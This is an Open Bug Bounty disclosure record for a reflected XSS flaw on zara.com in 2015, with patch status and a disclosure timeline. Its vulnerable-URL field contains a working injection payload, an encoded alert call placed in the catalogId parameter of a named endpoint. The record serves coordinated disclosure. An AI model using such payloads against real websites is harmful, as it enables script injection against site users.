zara.com XSS vulnerability

2015-09-01T18:48:00
ID OBB:83874
Type openbugbounty
Reporter dim0k
Modified 2015-09-01T18:50:00

Description

Vulnerable URL:
http://www.zara.com/webapp/wcs/stores/servlet/UserMenuDataJSON?catalogId=21052)%3Balert%28/XSSPOSED/%29%2f%2f&fts;=1&langId;=-20&storeId;=11727
Details:

Description| Value
---|---
Patched:| Yes, at 24.09.2015
Latest check for patch:| 24.09.2015 06:27 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 911
Google Pagerank| 6
VIP website status:| Yes
Check zara.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 1 September, 2015 18:48 GMT
Vulnerability existence verified and confirmed| 1 September, 2015 18:50 GMT